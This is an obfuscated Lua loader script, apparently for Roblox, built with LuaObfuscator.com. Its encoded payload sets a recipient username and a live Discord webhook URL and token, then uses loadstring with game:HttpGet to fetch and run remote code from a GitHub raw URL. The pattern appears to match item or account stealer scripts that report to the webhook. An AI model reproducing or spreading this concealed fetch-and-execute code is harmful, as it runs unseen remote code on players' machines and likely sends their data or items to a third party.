--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v70=v2(v0(v30,16));if v19 then local v76=0;local v77;while true do if (v76==1) then return v77;end if (v76==0) then v77=v5(v70,v19);v19=nil;v76=1;end end else return v70;end end end);local function v20(v31,v32,v33)if v33 then local v71=(v31/((5 -3)^(v32-(2 -(4 -3)))))%(2^(((v33-(1 -0)) -(v32-(878 -(282 + 595)))) + (1638 -(1523 + 114)))) ;return v71-(v71%(2 -1)) ;else local v72=(621 -(555 + (181 -(32 + 85))))^(v32-(1 -0)) ;return (((v31%(v72 + v72))>=v72) and (932 -(857 + 74))) or (568 -(367 + 197 + 4)) ;end end local function v21()local v34=0;local v35;while true do if (v34==(1 + 0)) then return v35;end if ((957 -(892 + 65))==v34) then v35=v1(v16,v18,v18);v18=v18 + (2 -1) ;v34=1 -0 ;end end end local function v22()local v36=0 -0 ;local v37;local v38;while true do if (v36==((258 + 92) -(87 + 263))) then v37,v38=v1(v16,v18,v18 + (182 -(67 + 113)) );v18=v18 + 2 ;v36=1 + 0 ;end if (v36==(2 -1)) then return (v38 * 256) + v37 ;end end end local function v23()local v39=0 -0 ;local v40;local v41;local v42;local v43;while true do if (v39==(952 -(802 + 150))) then v40,v41,v42,v43=v1(v16,v18,v18 + (7 -4) );v18=v18 + 4 ;v39=1 -0 ;end if (v39==((1 -0) + 0)) then return (v43 * ((16779400 -(1069 + 118)) -(915 + 82))) + (v42 * (185570 -120034)) + (v41 * (150 + 106)) + v40 ;end end end local function v24()local v44=v23();local v45=v23();local v46=2 -1 ;local v47=(v20(v45,1 + 0 ,43 -23 ) * ((1 + 1)^(804 -(201 + 571)))) + v44 ;local v48=v20(v45,37 -16 ,31 + 0 );local v49=((v20(v45,823 -((1742 -1374) + 423) )==(1 + 0)) and  -(3 -2)) or (3 -2) ;if (v48==(0 -(0 + 0))) then if (v47==(0 -0)) then return v49 * 0 ;else local v78=18 -(10 + 8) ;while true do if (v78==(0 + 0)) then v48=3 -2 ;v46=442 -(416 + (89 -63)) ;break;end end end elseif (v48==(2932 -(261 + 624))) then return ((v47==(0 -0)) and (v49 * ((1 + (1747 -(760 + 987)))/(0 -0)))) or (v49 * NaN) ;end return v8(v49,v48-((4359 -(1789 + 124)) -(630 + 793)) ) * (v46 + (v47/((440 -(145 + 293))^(482 -(44 + 386))))) ;end local function v25(v50)local v51;if  not v50 then v50=v23();if (v50==0) then return "";end end v51=v3(v16,v18,(v18 + v50) -(767 -(745 + 21)) );v18=v18 + v50 ;local v52={};for v67=1 + 0 , #v51 do v52[v67]=v2(v1(v3(v51,v67,v67)));end return v6(v52);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0;local v54;local v55;local v56;local v57;local v58;local v59;while true do local v69=572 -(426 + 146) ;while true do if (1==v69) then if (1==v53) then local v95=0 + 0 ;while true do if (v95==2) then v53=2;break;end if (v95==(1457 -(282 + 1174))) then for v107=1,v58 do local v108=0;local v109;local v110;local v111;local v112;while true do if (v108~=2) then else while true do if (0==v109) then v110=0;v111=nil;v109=1;end if (v109==1) then v112=nil;while true do if (v110==(811 -(569 + 242))) then local v163=0 -0 ;while true do if (v163==(1 + 0)) then v110=1025 -(706 + 318) ;break;end if (0==v163) then v111=v21();v112=nil;v163=1;end end end if (v110==1) then if (v111==1) then v112=v21()~=(1251 -(721 + 530)) ;elseif (v111==2) then v112=v24();elseif (v111==3) then v112=v25();end v59[v107]=v112;break;end end break;end end break;end if (v108==0) then v109=1271 -(945 + 326) ;v110=nil;v108=1;end if (v108~=(2 -1)) then else v111=nil;v112=nil;v108=2 + 0 ;end end end v57[703 -(271 + 429) ]=v21();v95=2;end if (v95==0) then v58=v23();v59={};v95=1 + 0 ;end end end break;end if ((1500 -(1408 + 92))~=v69) then else if (v53==(1086 -(461 + 625))) then local v96=1288 -(993 + 295) ;local v97;while true do if (v96==0) then v97=0;while true do if (v97==0) then local v113=0 + 0 ;while true do if (0==v113) then v54={};v55={};v113=1;end if (v113==(1172 -(418 + 753))) then v97=1;break;end end end if (v97~=(1 + 0)) then else local v114=0;while true do if (v114==(1 + 0)) then v97=2;break;end if (v114==(0 + 0)) then v56={};v57={v54,v55,nil,v56};v114=1 + 0 ;end end end if ((1324 -(1249 + 73))~=v97) then else v53=1 + 0 ;break;end end break;end end end if (v53==(1147 -(466 + 679))) then local v98=0;local v99;while true do if ((0 -0)==v98) then v99=0;while true do if (v99==0) then for v115=2 -1 ,v23() do local v116=1900 -(106 + 1794) ;local v117;local v118;local v119;local v120;while true do if ((0 + 0)==v116) then v117=0;v118=nil;v116=1;end if (v116~=(1 + 0)) then else v119=nil;v120=nil;v116=2;end if (v116~=(5 -3)) then else while true do if (v117==(2 -1)) then v120=nil;while true do if (v118==(115 -(4 + 110))) then while true do if (v119==(584 -(57 + 527))) then v120=v21();if (v20(v120,1,1428 -(41 + 1386) )~=(103 -(17 + 86))) then else local v182=0 + 0 ;local v183;local v184;local v185;local v186;local v187;local v188;while true do if (v182==(3 -1)) then v187=nil;v188=nil;v182=3;end if ((2 -1)==v182) then v185=nil;v186=nil;v182=168 -(122 + 44) ;end if (3==v182) then while true do if ((0 -0)==v183) then v184=0 -0 ;v185=nil;v183=1;end if (v183~=2) then else v188=nil;while true do if (v184~=(0 + 0)) then else local v190=0;local v191;while true do if (v190==0) then v191=0 + 0 ;while true do if ((1 -0)~=v191) then else v184=66 -(30 + 35) ;break;end if (v191==(0 + 0)) then v185=0;v186=nil;v191=1258 -(1043 + 214) ;end end break;end end end if (v184==1) then local v192=0 -0 ;while true do if (v192==1) then v184=1214 -(323 + 889) ;break;end if ((0 -0)==v192) then v187=nil;v188=nil;v192=581 -(361 + 219) ;end end end if ((322 -(53 + 267))==v184) then while true do if (v185==1) then local v193=0 + 0 ;while true do if (v193==0) then v188={v22(),v22(),nil,nil};if (v186==0) then local v202=0;local v203;local v204;local v205;while true do if (v202~=0) then else v203=0 -0 ;v204=nil;v202=1;end if (v202==1) then v205=nil;while true do if (v203==0) then local v211=0;while true do if (v211~=(0 + 0)) then else v204=0 + 0 ;v205=nil;v211=851 -(20 + 830) ;end if (v211==1) then v203=1;break;end end end if (v203==(1 + 0)) then while true do if (v204==0) then v205=126 -(116 + 10) ;while true do if (v205~=(0 + 0)) then else v188[3]=v22();v188[742 -(542 + 196) ]=v22();break;end end break;end end break;end end break;end end elseif (v186==(1 -0)) then v188[1 + 2 ]=v23();elseif (v186==2) then v188[3]=v23() -((2 + 0)^16) ;elseif (v186~=(2 + 1)) then else local v212=0 -0 ;local v213;local v214;local v215;while true do if (v212==0) then v213=0;v214=nil;v212=2 -1 ;end if (v212~=(1552 -(1126 + 425))) then else v215=nil;while true do if (v213~=(405 -(118 + 287))) then else local v222=0;while true do if (v222==1) then v213=3 -2 ;break;end if (v222==0) then v214=0;v215=nil;v222=1;end end end if (v213~=1) then else while true do if (v214==0) then v215=0;while true do if (v215~=(1121 -(118 + 1003))) then else v188[3]=v23() -((5 -3)^(393 -(142 + 235))) ;v188[4]=v22();break;end end break;end end break;end end break;end end end v193=4 -3 ;end if ((1 + 0)~=v193) then else v185=2;break;end end end if (v185~=(979 -(553 + 424))) then else local v194=0 -0 ;local v195;local v196;while true do if (v194==1) then while true do if (v195==(0 + 0)) then v196=0 + 0 ;while true do if (v196==0) then local v209=0 + 0 ;while true do if (v209==0) then if (v20(v187,1,1)==1) then v188[1 + 1 ]=v59[v188[2 + 0 ]];end if (v20(v187,4 -2 ,2)~=(2 -1)) then else v188[6 -3 ]=v59[v188[3]];end v209=1 + 0 ;end if (v209==1) then v196=1;break;end end end if ((4 -3)==v196) then v185=756 -(239 + 514) ;break;end end break;end end break;end if (v194~=(0 + 0)) then else v195=1329 -(797 + 532) ;v196=nil;v194=1 + 0 ;end end end if (v185~=(0 + 0)) then else local v197=0 -0 ;local v198;while true do if (v197==0) then v198=0;while true do if (v198~=1) then else v185=1203 -(373 + 829) ;break;end if (v198==(731 -(476 + 255))) then local v206=0;while true do if (v206==(1130 -(369 + 761))) then local v210=0 + 0 ;while true do if (v210==(1 -0)) then v206=1;break;end if (v210~=(0 -0)) then else v186=v20(v120,240 -(64 + 174) ,1 + 2 );v187=v20(v120,4,6);v210=1 -0 ;end end end if (v206~=(337 -(144 + 192))) then else v198=1;break;end end end end break;end end end if (v185~=(219 -(42 + 174))) then else if (v20(v187,3 + 0 ,3 + 0 )==1) then v188[2 + 2 ]=v59[v188[1508 -(363 + 1141) ]];end v54[v115]=v188;break;end end break;end end break;end if (1==v183) then local v189=0;while true do if (v189==1) then v183=1582 -(1183 + 397) ;break;end if (v189==0) then v186=nil;v187=nil;v189=2 -1 ;end end end end break;end if (v182~=0) then else v183=0 + 0 ;v184=nil;v182=1 + 0 ;end end end break;end end break;end if (v118~=(1975 -(1913 + 62))) then else v119=0 + 0 ;v120=nil;v118=2 -1 ;end end break;end if (v117~=0) then else v118=0;v119=nil;v117=1;end end break;end end end for v121=1,v23() do v55[v121-(1934 -(565 + 1368)) ]=v28();end v99=3 -2 ;end if (v99==(1662 -(1477 + 184))) then return v57;end end break;end end end v69=1 -0 ;end end end end local function v29(v60,v61,v62)local v63=0;local v64;local v65;local v66;while true do if (1==v63) then v66=v60[3];return function(...)local v79=v64;local v80=v65;local v81=v66;local v82=v27;local v83=1;local v84= -1;local v85={};local v86={...};local v87=v12("#",...) -1 ;local v88={};local v89={};for v93=0,v87 do if (v93>=v81) then v85[v93-v81 ]=v86[v93 + 1 ];else v89[v93]=v86[v93 + 1 ];end end local v90=(v87-v81) + 1 ;local v91;local v92;while true do local v94=0;while true do if (v94==0) then v91=v79[v83];v92=v91[1];v94=1;end if (v94==1) then if (v92<=5) then if (v92<=2) then if (v92<=0) then v83=v91[3];elseif (v92>1) then v89[v91[2]]=v91[3]~=0 ;else local v129;local v130,v131;local v132;local v133;v62[v91[3]]=v89[v91[2]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v62[v91[3]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v62[v91[3]];v83=v83 + 1 ;v91=v79[v83];v133=v91[2];v132=v89[v91[3]];v89[v133 + 1 ]=v132;v89[v133]=v132[v91[4]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3]~=0 ;v83=v83 + 1 ;v91=v79[v83];v133=v91[2];v130,v131=v82(v89[v133](v13(v89,v133 + 1 ,v91[3])));v84=(v131 + v133) -1 ;v129=0;for v157=v133,v84 do local v158=0;while true do if (v158==0) then v129=v129 + 1 ;v89[v157]=v130[v129];break;end end end v83=v83 + 1 ;v91=v79[v83];v133=v91[2];v89[v133]=v89[v133](v13(v89,v133 + 1 ,v84));v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]();v83=v83 + 1 ;v91=v79[v83];v83=v91[3];end elseif (v92<=3) then v89[v91[2]]=v91[3];elseif (v92>4) then v89[v91[2]]();elseif (v89[v91[2]]==v91[4]) then v83=v83 + 1 ;else v83=v91[3];end elseif (v92<=8) then if (v92<=6) then v62[v91[3]]=v89[v91[2]];elseif (v92>7) then local v143=0;local v144;while true do if (v143==0) then v144=v91[2];v89[v144]=v89[v144](v13(v89,v144 + 1 ,v84));break;end end else do return;end end elseif (v92<=10) then if (v92==9) then local v145=v91[2];local v146,v147=v82(v89[v145](v13(v89,v145 + 1 ,v91[3])));v84=(v147 + v145) -1 ;local v148=0;for v159=v145,v84 do v148=v148 + 1 ;v89[v159]=v146[v148];end else local v149=0;while true do if (2==v149) then v62[v91[3]]=v89[v91[2]];v83=v83 + 1 ;v91=v79[v83];v149=3;end if (1==v149) then v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v149=2;end if (v149==3) then v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v149=4;end if (v149==4) then v83=v91[3];break;end if (v149==0) then v62[v91[3]]=v89[v91[2]];v83=v83 + 1 ;v91=v79[v83];v149=1;end end end elseif (v92==11) then local v150=v91[2];local v151=v89[v91[3]];v89[v150 + 1 ]=v151;v89[v150]=v151[v91[4]];else v89[v91[2]]=v62[v91[3]];end v83=v83 + 1 ;break;end end end end;end if (v63==0) then v64=v60[1];v65=v60[2];v63=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F03093O00557365724E616D6532030A3O006B72612O796561676572030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403403O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4153544F52534352495054532F4153544F52322F6D61696E2F4153544F5203083O00557365724E616D6503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3135303331303237383138313936312O37382F6870385552316E37364D6A5A4755514454726B3844435F535A4A594E3345556C484372654379437837553447482D4150434262722O71753730797748777869774B79686100173O0012033O00013O0026043O000E0001000200044O000E0001001203000100043O001201000100033O00122O000100053O00122O000200063O00202O00020002000700122O000400086O000500016O000200056O00013O00024O00010001000100044O001600010026043O00010001000100044O00010001001203000100043O00120A000100093O00122O0001000B3O00122O0001000A3O00124O00023O00044O000100012O00073O00017O00",v9(),...);
